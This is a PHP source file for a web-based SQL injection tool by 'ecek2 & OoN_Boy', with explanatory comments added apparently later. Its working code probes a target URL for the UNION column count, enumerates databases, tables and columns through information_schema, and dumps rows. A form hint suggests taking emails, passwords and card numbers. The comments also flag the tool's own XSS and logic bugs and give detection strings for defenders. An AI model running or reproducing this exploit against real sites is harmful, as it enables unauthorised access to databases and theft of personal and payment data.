code sql tools
<?
// No execution time limit: every branch below issues one outbound HTTP request
// per row or per loop iteration, so a single POST can keep this process busy
// for an unbounded time.
set_time_limit(0);
// Suppresses every warning and notice for the whole page, so a failed
// file_get_contents() or an undefined variable in the branches below produces
// no visible error at all.
error_reporting(0);
// All inputs come straight from POST with no presence or format check.
// strip_tags() on a missing field (null) returns "", so each of these variables
// is always set; the later isset() checks on them are therefore always true.
// strip_tags() removes tags but does not escape quotes, and these values are
// echoed unescaped into value="..." attributes in the forms further down, so
// the page reflects its own input without output encoding (htmlspecialchars()
// with ENT_QUOTES would be the appropriate encoder for that attribute context).
$fungsi=strip_tags($_POST['fungsi']);
$url=strip_tags($_POST['url']);
$db=strip_tags($_POST['db']);
$table=strip_tags($_POST['table']);
$column=strip_tags($_POST['column']);
$start=strip_tags($_POST['start']);
$stop=strip_tags($_POST['stop']);
$target=strip_tags($_POST['target']);
?>
<title>.: SQL INJECTION TOOL BY ECEK2 & OON_BOY :.</title>
<head>
</head>
<script>
function show(id){
// Reveal the element with the given id by switching its display to block.
var element = document.getElementById(id);
element.style.display = "block";
}
function hide(id){
// Collapse the element with the given id by switching its display to none.
var element = document.getElementById(id);
element.style.display = "none";
}
function db(){
// Make "db" the only visible panel; the panels are visited in their fixed order.
var panels = ["db", "table", "column", "dump", "findcol"];
panels.forEach(function (name) { name === "db" ? show(name) : hide(name); });
}
function table(){
// Make "table" the only visible panel; the panels are visited in their fixed order.
var panels = ["db", "table", "column", "dump", "findcol"];
panels.forEach(function (name) { name === "table" ? show(name) : hide(name); });
}
function column(){
// Make "column" the only visible panel; the panels are visited in their fixed order.
var panels = ["db", "table", "column", "dump", "findcol"];
panels.forEach(function (name) { name === "column" ? show(name) : hide(name); });
}
function dump(){
// Make "dump" the only visible panel; the panels are visited in their fixed order.
var panels = ["db", "table", "column", "dump", "findcol"];
panels.forEach(function (name) { name === "dump" ? show(name) : hide(name); });
}
function findcol(){
// Make "findcol" the only visible panel; the panels are visited in their fixed order.
var panels = ["db", "table", "column", "dump", "findcol"];
panels.forEach(function (name) { name === "findcol" ? show(name) : hide(name); });
}
function help(){
// Usage/contact notice shown in a browser alert; the text is kept verbatim.
var message = "This tool is for helping us playing with sql injection for php mysql site \n Please contact us when you find bug in this tool \n oon@oonboy.info";
alert(message);
}
</script>
<style>
#db,#table,#column,#dump,#findcol {display:none;}
</style>
<a href="javascript:findcol();">FindCol</a> |
<a href="javascript:db();">Database</a> |
<a href="javascript:table();">Table</a> |
<a href="javascript:column();">Column</a> |
<a href="javascript:dump();">Dump</a> |
<a href="javascript:help();">Help</a> |
<b>Created by <a href=http://ecek2.dibatam.com>ecek2</a> & <a
href=http://oon.batamhacker.or.id>OoN_Boy</a></b>
<p>
<div id=db>
<form method=post>
<input type=hidden name=fungsi value=db>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
<tr><td><td><td><input type=submit value="Show Databases"></table>
</form>
</div>
<div id=table>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
<input type=hidden name=fungsi value=table>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>"><br>
<tr><td>DB<td> : <td><input name=db value="<?=$db;?>"><br>
<tr><td><td><td><input type=submit value="Show Table"></table>
</form>
</div>
<div id=column>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
<input type=hidden name=fungsi value=column>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
<tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
<tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
<tr><td><td><td><input type=submit value="Show Column"></table>
</form>
</div>
<div id=dump>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
<input type=hidden name=fungsi value=dump>
<table><tr><td>url<td> : <td><input name=url size=100 value="<?=$url;?>">
<tr><td>DB<td> : <td><input name=db value="<?=$db;?>">
<tr><td>Table<td> : <td><input name=table value="<?=$table;?>">
<tr><td>Column<td> : <td><input name=column value="<?=$column;?>"> ex : email,passwd,card_num
<tr><td>Start<td> : <td><input name=start value="<?=$start;?>"> **start from field number**
<tr><td>Stop<td> : <td><input name=stop value="<?=$stop;?>"> **stop field number**
<tr><td><td><td><input type=submit value="Dump"></table>
</form>
</div>
<div id=findcol>
ex_url : http://www.target.com/vulner.php?id=-1+union+select+1,k0pl0,3,4,5,6,7,8,9
<form method=post>
Target <input name=target size=100 value="<?=$target;?>"><input type=submit value=test>
</form>
</div>
<?
/* GET DATABASE NAME
 * Runs for fungsi=db. The submitted url is expected to contain the literal
 * placeholder "k0pl0"; str_replace() swaps it for a concat() expression, the
 * schemata suffix and "--" are appended, and the resulting URL is fetched by
 * this web server with file_get_contents(). 0x6b30706c30 is the same marker
 * "k0pl0" as a hex literal; antara() (defined at the bottom of the file) returns
 * the text found between two markers in the response body.
 * Review/detection note: the marker, "+from+information_schema.schemata" and the
 * trailing "--" appear verbatim in every request URL this branch sends (one for
 * the count, then one per row), so they are stable strings for WAF rules and
 * access-log review on the receiving side.
 * There is no response validation: on a failed fetch or a missing marker
 * antara() returns "" and the loop simply does not run, silently, because
 * warnings are suppressed at the top of the file. Whatever antara() extracts
 * from the remote response is echoed into this page without encoding.
 */
if(isset($url) && $fungsi=="db"){
// Count expression and per-row expression, each wrapped in the marker.
$countdb="concat(0x6b30706c30,count(schema_name),0x6b30706c30)";
$showdb="concat(0x6b30706c30,schema_name,0x6b30706c30)";
$showdb2="+from+information_schema.schemata";
$end="--";
//print "$url <br>";
$url_1=str_replace("k0pl0",$countdb,$url);
$url_2=$url_1.$showdb2.$end;
$url_3=str_replace("k0pl0",$showdb,$url);
// Outbound request; no explicit timeout, status or content-type check.
// isset($url) is always true because $url is assigned unconditionally above.
$data=file_get_contents($url_2);
// $jumlah is a string (substr result) or ""; "" makes the loop bound 0.
$jumlah=antara($data,"k0pl0","k0pl0");
echo "$jumlah database<br>";
// One further request per row, $i interpolated into "+limit+$i,1".
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$showdb2."+limit+$i,1".$end;
$datax=file_get_contents($urlx);
$namadatabase=antara($datax,"k0pl0","k0pl0");
// Remote-derived text goes straight into the HTML output here.
echo "$nomor : $namadatabase <br>";
flush();
}
}
/* GET TABLE NAME
 * Runs for fungsi=table and mirrors the database branch above: a count request
 * followed by one request per row, all built from the "k0pl0" placeholder in
 * the submitted url and wrapped in the hex marker 0x6b30706c30.
 * $db, when non-empty, is passed through bin2hex() and appended as a
 * "+where+table_schema=0x..." filter; $url itself is never checked for
 * emptiness or for containing the placeholder.
 * Review/detection note: "+from+information_schema.tables", the marker and the
 * trailing "--" are present verbatim in every request this branch sends.
 * Failures are silent (error_reporting(0) above): a failed fetch yields
 * $jumlah = "" and no loop iterations. Extracted response text is echoed into
 * this page without encoding.
 */
if(isset($url) && $fungsi == "table"){
$query="concat(0x6b30706c30,count(table_name),0x6b30706c30)";
$next="+from+information_schema.tables";
$query2="concat(0x6b30706c30,table_name,0x6b30706c30)";
$end="--";
// Optional schema filter; bin2hex() turns the user-supplied name into a hex literal.
if(isset($db) && $db !==""){
$next=$next."+where+table_schema=0x".bin2hex($db);
}
$url_1=str_replace("k0pl0",$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace("k0pl0",$query2,$url);
//echo "inject : $url_2";
// Outbound request from this server; no timeout, status or content check.
$data=file_get_contents($url_2);
//echo $data;
// String count (or "") taken from between the markers in the response.
$jumlah=antara($data,"k0pl0","k0pl0");
echo "<br>$jumlah tables<br>";
// One request per row via "+limit+$i,1".
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next."+limit+$i,1".$end;
$datax=file_get_contents($urlx);
$namatable=antara($datax,"k0pl0","k0pl0");
// Remote-derived text goes straight into the HTML output here.
echo "$nomor : $namatable <br>";
flush();
}
}
// GET COLUMN NAME LIST
// Runs for fungsi=column; same count-then-one-request-per-row pattern as the
// two branches above, restricted with "+where+table_name=0x<hex of $table>"
// and, when $db is non-empty, "+and+table_schema=0x<hex of $db>".
// Note on the guard: $url3 (no underscore) is never assigned anywhere visible
// in this file, so with error_reporting(0) that clause is null !== "" and
// always true; an empty $url is not rejected here, unlike the dump branch,
// which checks $url !== "". isset($url) and isset($table) are always true
// because both are assigned unconditionally at the top of the file.
// Review/detection note: "+from+information_schema.columns", the marker
// 0x6b30706c30 and the trailing "--" are present verbatim in every request.
// Extracted response text is echoed into this page without encoding.
if(isset($url) && $url3 !== "" && isset($table) && $table !== "" && $fungsi == "column"){
$query="concat(0x6b30706c30,count(column_name),0x6b30706c30)";
// bin2hex() turns the user-supplied table name into a hex literal.
$next="+from+information_schema.columns+where+table_name=0x".bin2hex($table);
$query2="concat(0x6b30706c30,column_name,0x6b30706c30)";
$end="--";
// Optional schema filter, same encoding as the table name.
if(isset($db) && $db !==""){
$next=$next."+and+table_schema=0x".bin2hex($db);
}
$url_1=str_replace("k0pl0",$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace("k0pl0",$query2,$url);
//echo "inject : $url_2";
// Outbound request from this server; no timeout, status or content check.
$data=file_get_contents($url_2);
//echo $data;
// String count (or "") taken from between the markers in the response.
$jumlah=antara($data,"k0pl0","k0pl0");
echo "<br>$jumlah Columns<br>";
for($i=0;$i<$jumlah;$i++){
flush();
$nomor=($i+1);
$urlx=$url_3.$next."+limit+$i,1".$end;
//echo $urlx;
$datax=file_get_contents($urlx);
// Variable name is inherited from the table branch; it holds a column name here.
$namatable=antara($datax,"k0pl0","k0pl0");
// Remote-derived text goes straight into the HTML output here.
echo "$nomor : $namatable <br>";
flush();
}
}
// DUMB DATA (dump rows)
// Runs for fungsi=dump when $url, $table and $column are all non-empty.
// Unlike the branches above, $table, $db and $column are inserted into the
// request verbatim (no bin2hex()), and the row loop is driven by the
// user-supplied $start/$stop strings rather than by the count that is
// fetched and displayed first: $start and $stop receive no numeric
// validation, and the loop bound is inclusive (<=), so "Stop" is requested
// as well. 0x203a20 is the hex literal for " : ", used as the field separator.
// Review/detection note: the marker 0x6b30706c30, "concat_ws(0x203a20," and
// the trailing "--" are present verbatim in every request this branch sends;
// the number of requests is ($stop - $start + 1) plus one for the count.
// Failures are silent (error_reporting(0) above), and extracted response text
// is echoed into this page without encoding.
if($fungsi=="dump" && isset($url) && $url !== "" && isset($table) && $table !== "" && isset($column) && $column !=="" ){
$query="concat(0x6b30706c30,count(*),0x6b30706c30)";
$next="+from+$table";
// $column is expected to be a comma-separated list (see the form hint) and is
// spliced in unchanged.
$query2="concat(0x6b30706c30,concat_ws(0x203a20,".$column."),0x6b30706c30)";
$end="--";
// When a database is given the FROM target is rebuilt as "$db.$table".
if(isset($db) && $db !==""){
$next="+from+$db.$table";
}
$url_1=str_replace("k0pl0",$query,$url);
$url_2=$url_1.$next.$end;
$url_3=str_replace("k0pl0",$query2,$url);
//echo "inject : $url_2";
// Outbound request from this server; no timeout, status or content check.
$data=file_get_contents($url_2);
//echo $data;
// Count is only displayed; it does not bound the loop below.
$jumlah=antara($data,"k0pl0","k0pl0");
echo "<br>$jumlah data<br>";
// $start and $stop are raw POST strings; $i is interpolated into "+limit+$i,1".
for($i=$start;$i<=$stop;$i++){
flush();
$nomor=$i;
$urlx=$url_3.$next."+limit+$i,1".$end;
//echo $urlx;
$datax=file_get_contents($urlx);
// Variable name is inherited from the table branch; it holds a data row here.
$namatable=antara($datax,"k0pl0","k0pl0");
// Remote-derived text goes straight into the HTML output here.
echo "$nomor : $namatable <br>";
flush();
}
}
// GET MAGIC NUMBER (column-count probe for the "FindCol" form)
// Guard: this block is the only one not gated on $fungsi. $target is assigned
// unconditionally at the top of the file (so isset($target) is always true),
// and $taget (missing "r") is never assigned anywhere visible in this file, so
// under error_reporting(0) the clause is null !== "" and also always true.
// The block therefore runs on every request, including the initial GET of the
// page, where $target is "" and file_get_contents() is handed a string with no
// URL scheme; the 99 failed fetches are silent and the page ends with the red
// "not Vulner" line.
// Behaviour: up to 99 requests, each appending one more column slot carrying a
// hex-encoded marker ("k0pl0" + position + "oon"); eregi() is used only as a
// case-insensitive substring test on the response body. On a hit, one more
// request is sent whose payload concatenates the hex labels for
// "database version : ", "database user : " and "database name : " with
// version(), user() and database(), separated by 0x3c62723e ("<br>"), and the
// extracted text is echoed into this page unencoded. $linkinjek is also placed
// unquoted into an href attribute without encoding.
// Review/detection note: "-1+union+select", the marker 0x6b30706c30 and the
// trailing "--" appear verbatim in every request URL this block sends.
if(isset($target) && $taget !== ""){
echo "trying... 1 ";
// Probe prefix (with marker) and the plain prefix used to rebuild the final link.
$targetx=$target."-1+union+select+0x6b30706c30";
$targety=$target."-1+union+select+1";
$injek="";
$y="";
$end="--";
for($i=1;$i<100;$i++){
flush();
// $y accumulates ",2,3,..." for the plain link; $injek the marker-bearing slots.
$y .= ",".($i+1);
$oon=($i+1)."oon";
$hexx=bin2hex($oon);
$injek.=",0x6b30706c30".$hexx;
$link=$targetx.$injek;
$akhir = $link.$end;
//echo $akhir;
echo ($i+1)." ";
// Outbound request from this server; no timeout, status or content check.
$data=file_get_contents($akhir);
if(eregi("k0pl0",$data)){
// Position of the echoed slot, read from between "k0pl0" and "oon".
$magicnumber=antara($data,"k0pl0","oon");
$mbuh=",".$magicnumber.",";
$zzz=str_replace($mbuh,",k0pl0,",$targety.$y);
$linkinjek=$targety.$y.$end;
// $zzz and $linkinjek derive from user input and are written into HTML and an
// unquoted href without encoding.
echo "<br>VULNER : $zzz<br>Magic number= $magicnumber<br><a href=$linkinjek target=\"_blank\">$linkinjek</a><p><b>info</b><br>";
$ambilinfo=str_replace("k0pl0","concat(0x6b30706c30,concat_ws(0x3c62723e,concat(0x64617461626173652076657273696f6e203a20,version()),concat(0x64617461626173652075736572203a20,user()),concat(0x6461746162617365206e616d65203a20,database())),0x6b30706c30)",$zzz).$end;
$datainfo=file_get_contents($ambilinfo);
$info=antara($datainfo,"k0pl0","k0pl0");
// Remote-derived text goes straight into the HTML output here.
echo $info;
break;
}
// Loose comparison of int $i with the string "99"; the closing tag in the
// message is written as <b> rather than </b>.
if($i=="99"){echo "<br><font color=red><b>Maybe this site is not Vulner, or you can try to inject it manually :)<b></font>";}
flush();
}
}
function antara($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);